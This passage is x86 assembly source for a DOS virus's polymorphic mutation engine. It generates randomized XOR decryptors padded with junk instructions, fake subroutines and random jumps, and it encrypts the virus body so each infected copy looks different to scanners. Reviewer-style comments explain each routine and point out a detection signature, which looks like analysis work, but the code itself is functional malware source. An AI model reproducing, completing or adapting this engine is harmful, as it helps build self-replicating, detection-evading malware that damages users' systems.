call get_rnd
and al,38h
mov byte ptr cs:[decrypt_register],al
;Chose segment registers for memory operations
call get_seg_reg
mov byte ptr cs:[address_seg_1],al
call get_seg_reg
mov byte ptr cs:[address_seg_2],al
;Fill our buffer with garbage
mov ax,cs
mov ds,ax
mov es,ax
mov di,offset virus_copy
push di
mov cx,decryptor
cld
fill_garbage:
call get_rnd
stosb
loop fill_garbage
pop di
;Now es:di points to the buffer were engine put polymorphic code
choose_type:
;Select the type of filler
mov ax,(end_step_table-step_table)/2
call rand_in_range
;Avoid same types in a row
cmp ax,word ptr cs:[last_step_type]
je choose_type
mov word ptr cs:[last_step_type],ax
add ax,ax
mov bx,ax
cld
call word ptr cs:[step_table+bx]
cmp byte ptr cs:[decrypt_pointer],05h
jne choose_type
;Generate some garbage
call rnd_garbage
;Generate a jump to virus body
mov al,0E9h
stosb
mov ax,decryptor
mov bx,di
sub bx,offset virus_copy-02h
sub ax,bx
stosw
;Store random crypt value
get_rnd_key:
call get_rnd
or al,al
jz get_rnd_key
xchg bx,ax
mov byte ptr cs:[clave_crypt],bl
;Copy virus body to the working area while encrypt
mov si,offset virus_body
mov di,offset virus_copy+decryptor
mov cx,lenvir-decryptor-01h
cld
load_crypt:
lodsb
xor al,bl
stosb
loop load_crypt
;Store key without encryption
movsb
;Restore all regs and return to infection routine
call pop_all
ret
;-----------------------------------------------------------------------------
;Get a segment-override prefix byte for the memory operands of the
;generated decryptor (consumed by inst_decrypt_one via address_seg_1 and
;address_seg_2).
;In:    cs:[prog_type]
;Out:   al = prefix byte. When prog_type is "C": one of 26h (ES:), 2Eh (CS:)
;       or 3Eh (DS:) chosen at random, never 36h (SS:). Otherwise always 2Eh.
;Clobb: al, flags (plus whatever get_rnd clobbers)
;NOTE(review): "C" presumably marks a target where DS and ES equal CS at run
;time, so any of the three prefixes addresses the virus image; the other
;type keeps CS: only - confirm against the infection routine.
;-----------------------------------------------------------------------------
get_seg_reg:
cmp byte ptr cs:[prog_type],"C"
je use_ds_es
;Fixed CS: prefix
mov al,2Eh
ret
use_ds_es:
call get_rnd
;Keep bits 3-4 only: 00h, 08h, 10h or 18h
and al,18h
;10h would become 36h (SS:); retry (re-running the prog_type test is harmless)
cmp al,10h
je get_seg_reg
;00h->26h ES:, 08h->2Eh CS:, 18h->3Eh DS:
or al,26h
ret
;-----------------------------------------------------------------------------
;Emit the next decryptor instruction at es:di, or a call to the subroutine
;that already holds it (built earlier by sub_decryptor).
;In:    es:di = output position
;       cs:[decrypt_pointer] = index of the last instruction emitted
;       cs:[decrypt_sub] = 0, or address of the jmp displacement slot of a
;       pending subroutine
;Out:   es:di advanced past the emitted code; decrypt_pointer advanced
;       unless nothing was emitted
;Clobb: ax, bx, flags (plus whatever the instruction_table routine clobbers)
;NOTE(review): instruction_table is not visible here. From the checks below,
;from sub_decryptor (index 5 is never put in a subroutine) and from the
;caller's exit test (decrypt_pointer == 5), index 3 looks like the per-byte
;decrypt step and index 5 the loop branch - confirm against the table.
;-----------------------------------------------------------------------------
next_decryptor:
;Next instruction counter
inc byte ptr cs:[decrypt_pointer]
;Check if there is a subroutine which already contains the next instruction
cmp word ptr cs:[decrypt_sub],0000h
je build_now
;If so emit a call to that subroutine instead of the instruction itself
call do_call_decryptor
ret
build_now:
;Else get the index of the instruction to build
mov bl,byte ptr cs:[decrypt_pointer]
;Instruction 3 is only ever emitted inside a subroutine (see sub_decryptor)
cmp bl,03h
jne entry_from_sub
;No instruction was created so restore old pointer
dec byte ptr cs:[decrypt_pointer]
ret
entry_from_sub:
;Entry point when called from sub_decryptor with bl = index to build;
;bx is doubled to index a table of near pointers
xor bh,bh
add bx,bx
;Build instruction
call word ptr cs:[instruction_table+bx]
ret
<doc_update>
;-----------------------------------------------------------------------------
;Emit code that computes the load delta into bp:
;   call $+3          (E8 00 00)
;   pop  bp           (5D)
;   [optional garbage]
;   sub  bp,imm16     (81 ED imm16)
;imm16 = (position of the call within virus_copy) + 103h. At run time the
;popped return address is (load address of the call) + 3, so
;bp = (load address of the emitted code) - 100h, i.e. the displacement of
;the running copy from an assumed 100h origin.
;In:    es:di = output position
;Out:   es:di advanced
;Clobb: ax, flags (plus rnd_garbage clobbers), one stack slot while running
;NOTE(review): the E8 00 00 5D call/pop pair is the classic "get current IP"
;idiom and a useful static signature for this engine.
;-----------------------------------------------------------------------------
inst_get_delta:
;Remember where the call will be placed
push di
;call to the next instruction: stosw writes E8 00, the next stosw 00 5D
mov ax,00E8h
stosw
mov ax,5D00h
stosw
;Generate some garbage
call rnd_garbage
;sub bp,imm16 (81 /5 with rm=bp): bytes 81 ED
mov ax,0ED81h
stosw
;imm16 = call position relative to virus_copy, plus 103h
pop ax
sub ax,offset virus_copy-0103h
no_sub_psp:
stosw
ret
;-----------------------------------------------------------------------------
;Emit "mov si/di,imm16" loading the loop counter with the number of bytes
;to decrypt (lenvir-decryptor-01h, the same length the caller encrypts in
;its load_crypt loop).
;In:    cs:[address_register] = 0 (counter in si) or 1 (counter in di)
;Out:   es:di advanced by 3
;Clobb: ax, flags
;NOTE(review): address_register is assumed to be only 0 or 1 - every use
;adds or subtracts it from a fixed opcode, any other value encodes a
;different register.
;-----------------------------------------------------------------------------
inst_load_counter:
;0BEh = mov si,imm16; 0BFh = mov di,imm16
mov al,0BEh
add al,byte ptr cs:[address_register]
stosb
;Store size of encrypted data
mov ax,lenvir-decryptor-01h
stosw
ret
;-----------------------------------------------------------------------------
;Emit code that points the data register at the encrypted body:
;   mov di/si,offset virus_body   (BF/BE imm16)
;   [optional garbage]
;   add di/si,bp                  (03 FD / 03 F5)
;The pointer uses the register that is NOT the counter: address_register 0
;gives di, 1 gives si (inst_load_counter uses si/di respectively).
;In:    cs:[address_register] = 0 or 1
;Out:   es:di advanced
;Clobb: ax, cx, flags (plus rnd_garbage clobbers)
;-----------------------------------------------------------------------------
inst_load_pointer:
;0BFh = mov di,imm16; 0BEh = mov si,imm16
mov al,0BFh
sub al,byte ptr cs:[address_register]
stosb
;Store offset position of encrypted data
mov ax,offset virus_body
stosw
;Generate garbage in some cases
call rnd_garbage
;ModRM for add reg16,bp: FDh = di,bp; F5h = si,bp. The reg field is bits
;3-5, so address_register<<3 (0 or 8) is subtracted from FDh
mov ch,byte ptr cs:[address_register]
mov cl,03h
rol ch,cl
;03h = add r16,r/m16; stosw writes 03h then the ModRM byte
mov ax,0FD03h
sub ah,ch
stosw
ret
;-----------------------------------------------------------------------------
;Emit the two instructions that decrypt one byte:
;   seg1: mov reg8,[bp+offset clave_crypt]   (prefix 8A modrm disp16)
;   seg2: xor [di/si],reg8                   (prefix 30 modrm)
;reg8 is cs:[decrypt_register], already shifted into the ModRM reg field
;(bits 3-5); the prefixes come from get_seg_reg.
;In:    cs:[address_seg_1], cs:[address_seg_2] = segment-override bytes
;       cs:[decrypt_register] = reg field, a multiple of 8 in 00h..38h
;       cs:[address_register] = 0 ([di]) or 1 ([si])
;Out:   es:di advanced by 8
;Clobb: ax, flags
;NOTE(review): [bp+disp16] defaults to SS, which is why a prefix is always
;emitted. The key is stored unencrypted at clave_crypt by the caller (see
;the "Store key without encryption" movsb in the load_crypt sequence).
;-----------------------------------------------------------------------------
inst_decrypt_one:
;Decode a mov reg,byte ptr seg:[key][bp]: prefix then 8Ah (mov r8,r/m8)
mov al,byte ptr cs:[address_seg_1]
mov ah,8Ah
stosw
;ModRM 86h = mod 10, rm 110 -> [bp+disp16]; or in the reg field
mov al,byte ptr cs:[decrypt_register]
or al,86h
stosb
;Store position of encryption key (disp16)
mov ax,offset clave_crypt
stosw
;Decode a xor byte ptr seg:[di/si],reg: prefix then 30h (xor r/m8,r8)
mov al,byte ptr cs:[address_seg_2]
mov ah,30h
stosw
;ModRM 05h = mod 00, rm 101 -> [di]; minus address_register gives 04h -> [si]
mov al,byte ptr cs:[decrypt_register]
or al,05h
sub al,byte ptr cs:[address_register]
stosb
ret
;-----------------------------------------------------------------------------
;Emit "inc di" (47h) or "inc si" (46h) to advance the data pointer, using
;the same register choice as inst_load_pointer.
;In:    cs:[address_register] = 0 (di) or 1 (si)
;Out:   es:di advanced by 1
;Clobb: al, flags
;-----------------------------------------------------------------------------
inst_inc_pointer:
;47h = inc di; 46h = inc si
mov al,47h
sub al,byte ptr cs:[address_register]
stosb
ret
;-----------------------------------------------------------------------------
;Emit the loop tail of the decryptor:
;   dec si/di                 (4E/4F) - the counter register
;   jz  exit                  (74 rel8)
;   [optional garbage]
;   jmp address_loop          (E9 rel16) - back to the loop head
;   [optional garbage]
; exit:
;cs:[address_loop] is the position do_call_decryptor recorded when it
;placed instruction 3.
;In:    cs:[address_register] = 0 (si) or 1 (di), cs:[address_loop]
;Out:   es:di advanced to "exit"
;Clobb: ax, flags (plus rnd_garbage clobbers), one stack slot while running
;-----------------------------------------------------------------------------
inst_dec_loop:
;Decode a dec reg instruction: 4Eh = dec si, 4Fh = dec di
mov al,4Eh
add al,byte ptr cs:[address_register]
stosb
;Decode a jz (74h rel8)
mov al,74h
stosb
;Remember the rel8 slot and leave it empty for now
push di
inc di
;Generate some garbage instructions
call rnd_garbage
;Decode a jmp to loop instruction (E9h rel16)
mov al,0E9h
stosb
;rel16 = target - (address after the displacement) = address_loop - di - 2
mov ax,word ptr cs:[address_loop]
sub ax,di
dec ax
dec ax
stosw
;Generate some garbage instructions
call rnd_garbage
;Store jz displacement: rel8 = here - (slot + 1)
mov ax,di
pop di
push ax
sub ax,di
dec ax
stosb
;Back to the end of the emitted code
pop di
ret
;-----------------------------------------------------------------------------
;With probability 1/2 (low bit of get_rnd) emit a run of garbage through
;g_generator, otherwise emit nothing.
;In:    es:di = output position
;Out:   es:di possibly advanced
;Clobb: al, flags, plus g_generator's clobbers (ax, bx, ...) when it runs
;-----------------------------------------------------------------------------
rnd_garbage:
call get_rnd
;Only the low bit decides
and al,01h
jz do_rnd_garbage
ret
do_rnd_garbage:
call g_generator
ret
;-----------------------------------------------------------------------------
;Emit "push reg / garbage / pop reg": builds a push-pop pair, lifts the pop
;opcode back out, overwrites it with garbage and re-emits it afterwards.
;In:    es:di = output position
;Out:   es:di advanced
;Clobb: ax, flags, plus g_generator's clobbers, one stack slot while running
;NOTE(review): assumes do_push_pop (not visible here) leaves di just past a
;one-byte pop opcode. The cs:[di] read relies on es = cs, which the caller
;establishes in its "mov ds,ax / mov es,ax" setup - confirm both.
;-----------------------------------------------------------------------------
do_push_g_pop:
;Build a random push pop
call do_push_pop
;Step back onto the pop opcode and save it
dec di
mov al,byte ptr cs:[di+00h]
push ax
;Garbage overwrites the pop and whatever follows
call g_generator
;Re-emit the saved pop
pop ax
stosb
ret
;-----------------------------------------------------------------------------
;Emit a garbage subroutine that is jumped over:
;   jmp  over        (E9 rel16)
;   body: garbage ... ret (C3)
;   over:
;Only one such subroutine is kept pending at a time: cs:[last_subroutine]
;receives the address of the jmp's displacement slot (the body starts 2
;bytes later); do_call_garbage relies on that offset and clears the value.
;In:    es:di = output position, cs:[last_subroutine]
;Out:   es:di advanced to "over", cs:[last_subroutine] set
;Clobb: ax, flags, plus g_generator's clobbers, one stack slot while running
;-----------------------------------------------------------------------------
do_subroutine:
;Nothing to do while a previous subroutine is still unused
cmp word ptr cs:[last_subroutine],0000h
je create_routine
ret
create_routine:
;Generate a jump instruction
mov al,0E9h
stosb
;Save address for jump construction
push di
;Save address of subroutine: the displacement slot, body is at di+2
mov word ptr cs:[last_subroutine],di
;Skip the displacement slot
inc di
inc di
;Generate some garbage code
call g_generator
;Insert ret instruction
mov al,0C3h
stosb
;Store jump displacement: rel16 = here - (slot + 2)
mov ax,di
pop di
push ax
sub ax,di
dec ax
dec ax
stosw
;Back to the end of the emitted code
pop di
ret
;-----------------------------------------------------------------------------
;Emit a subroutine holding the NEXT decryptor instruction (index
;decrypt_pointer+1), jumped over at this point:
;   jmp  over
;   body: [garbage] <decryptor instruction> [garbage] ret
;   over:
;decrypt_pointer is not advanced here; the next next_decryptor call sees
;cs:[decrypt_sub] != 0 and emits a call to this body instead of building
;the instruction. Index 5 (the loop branch) is never placed in a subroutine.
;In:    es:di, cs:[decrypt_pointer], cs:[decrypt_sub]
;Out:   es:di advanced, cs:[decrypt_sub] = address of the jmp displacement
;       slot (body starts 2 bytes later, see do_call_decryptor)
;Clobb: ax, bx, flags, plus the clobbers of rnd_garbage and of the built
;       instruction; one stack slot while running
;-----------------------------------------------------------------------------
sub_decryptor:
;Only one pending decryptor subroutine at a time
cmp word ptr cs:[decrypt_sub],0000h
je ok_subroutine
ret
ok_subroutine:
;Do not generate the loop branch into a subroutine
mov bl,byte ptr cs:[decrypt_pointer]
inc bl
cmp bl,05h
jne no_loop_sub
ret
no_loop_sub:
;Generate a jump instruction
mov al,0E9h
stosb
;Save address for jump construction
push di
;Save address of subroutine (displacement slot; body at di+2)
mov word ptr cs:[decrypt_sub],di
inc di
inc di
;bl = index to build; rnd_garbage may clobber bx, so keep it
push bx
call rnd_garbage
pop bx
;Enter next_decryptor's table dispatch with bl already set
call entry_from_sub
call rnd_garbage
build_return:
;Insert ret instruction
mov al,0C3h
stosb
;Store jump displacement: rel16 = here - (slot + 2)
mov ax,di
pop di
push ax
sub ax,di
dec ax
dec ax
stosw
;Back to the end of the emitted code
pop di
ret
;-----------------------------------------------------------------------------
;Emit "call body" (E8 rel16) to the subroutine built by sub_decryptor and
;release it. When the instruction being placed is index 3 the position of
;this call is recorded in cs:[address_loop] as the loop-back target that
;inst_dec_loop jumps to.
;In:    es:di, cs:[decrypt_pointer], cs:[decrypt_sub] = address of the
;       subroutine's jmp displacement slot (body starts 2 bytes later)
;Out:   es:di advanced by 3, cs:[decrypt_sub] = 0
;Clobb: ax, flags
;-----------------------------------------------------------------------------
do_call_decryptor:
cmp byte ptr cs:[decrypt_pointer],03h
jne no_store_call
;Save position of the loop head
mov word ptr cs:[address_loop],di
no_store_call:
;Build a call to our subroutine
mov al,0E8h
stosb
;rel16 = body - (di+2) with body = decrypt_sub + 2, i.e. decrypt_sub - di
mov ax,word ptr cs:[decrypt_sub]
sub ax,di
stosw
;Do not use this subroutine again
mov word ptr cs:[decrypt_sub],0000h
ret
;-----------------------------------------------------------------------------
;Emit "call body" (E8 rel16) to the garbage subroutine built by
;do_subroutine, if one is pending, and release it.
;In:    es:di, cs:[last_subroutine] = 0 or address of the subroutine's jmp
;       displacement slot (body starts 2 bytes later)
;Out:   es:di advanced by 3 when a call was emitted, cs:[last_subroutine]=0
;Clobb: ax, cx, flags
;-----------------------------------------------------------------------------
do_call_garbage:
mov cx,word ptr cs:[last_subroutine]
;Check if there is a subroutine to call
or cx,cx
jnz ok_call
;No, so exit
ret
ok_call:
;Build a call to our garbage subroutine
mov al,0E8h
stosb
;rel16 = body - (di+2) with body = slot + 2, i.e. slot - di
mov ax,cx
sub ax,di
stosw
;Do not use this subroutine again
mov word ptr cs:[last_subroutine],0000h
ret
;-----------------------------------------------------------------------------
;Emit a random short conditional jump (70h..77h: jo/jno/jb/jae/je/jne/jbe/ja)
;over a run of garbage:
;   jcc  over        (7x rel8)
;   garbage
;   over:
;Taken or not, only garbage is skipped.
;In:    es:di = output position
;Out:   es:di advanced to "over"
;Clobb: ax, flags, plus g_generator's clobbers, one stack slot while running
;-----------------------------------------------------------------------------
do_branch:
;Generate a random conditional jump instruction: 70h | (rnd & 7)
call get_rnd
and al,07h
or al,70h
stosb
;Save address for jump construction (the rel8 slot)
push di
;Skip the displacement slot
inc di
;Generate some garbage code
call g_generator
;Store jump displacement: rel8 = here - (slot + 1)
mov ax,di
pop di
push ax
sub ax,di
dec ax
stosb
;Back to the end of the emitted code
pop di
ret
;-----------------------------------------------------------------------------
;Lay down between 2 and 5 filler opcodes selected from op_table, never the
;same type twice in a row (cs:[last_fill_type]). Filler routines may call
;back into g_generator (do_branch, do_subroutine, do_push_g_pop do), so the
;remaining count is kept on the stack across each call.
;In:    es:di = output position
;Out:   es:di advanced
;Clobb: ax, bx, flags, plus whatever the selected filler routines clobber
;NOTE(review): rand_in_range and op_table are not visible here; presumably
;rand_in_range returns 0..ax-1 in ax. The count only masks ax with 03h, so
;get_rnd's value is assumed to be meaningful in al with ah disposable.
;-----------------------------------------------------------------------------
g_generator:
;Get a random number for fill count
call get_rnd
and ax,03h
;Min 2, max 5 opcodes
inc ax
inc ax
next_fill:
;ax = opcodes still to emit, preserved across the filler call
push ax
new_fill:
;Select the type of filler
mov ax,(end_op_table-op_table)/2
call rand_in_range
;Avoid same types in a row
cmp ax,word ptr cs:[last_fill_type]
je new_fill
mov word ptr cs:[last_fill_type],ax
;Index a table of near pointers
add ax,ax
mov bx,ax
call word ptr cs:[op_table+bx]
;Restore the count and continue until it reaches zero
pop ax
dec ax
jnz next_fill
ret
;-----------------------------------------------------------------------------
;Emit a filler "mov reg,imm":
;  16-bit: B9h/BAh/BBh imm16 -> mov cx/dx/bx,imm16 (never ax,sp,bp,si,di)
;   8-bit: B1h..B7h imm8     -> mov cl/dl/bl/ah/ch/dh/bh,imm8 (never al)
;NOTE(review): the excluded 16-bit registers are presumably the ones the
;generated decryptor itself keeps live (si/di as counter and pointer, bp
;as delta) plus ax; note that "mov ah,imm8" is still allowed here.
;In:    es:di = output position
;Out:   es:di advanced by 2 (8-bit form) or 3 (16-bit form)
;Clobb: ax, bh, flags, plus rand_16/get_rnd clobbers
;-----------------------------------------------------------------------------
move_imm:
call get_rnd
;Get a register number (low 4 bits: bit 3 = 16-bit form, bits 0-2 = reg)
and al,0Fh
;Make it a mov reg,imm: B0h..BFh
or al,0B0h
test al,00001000b
jz is_8bit_mov
;Clear bit 2 so only ax,cx,dx,bx remain (B8h..BBh)
and al,11111011b
mov ah,al
and ah,03h
;Not ax (reg 0): pick again
jz move_imm
stosb
;16-bit immediate
call rand_16
stosw
ret
is_8bit_mov:
mov bh,al
;Is it al (reg 0)?
and bh,07h
;Yes, pick again
jz move_imm
stosb
;8-bit immediate
call get_rnd
stosb
ret
;-----------------------------------------------------------------------------
;Now we knock boots with mov reg,reg's
;but never to al or ax.
;-----------------------------------------------------------------------------
move_with_reg:
call rand_16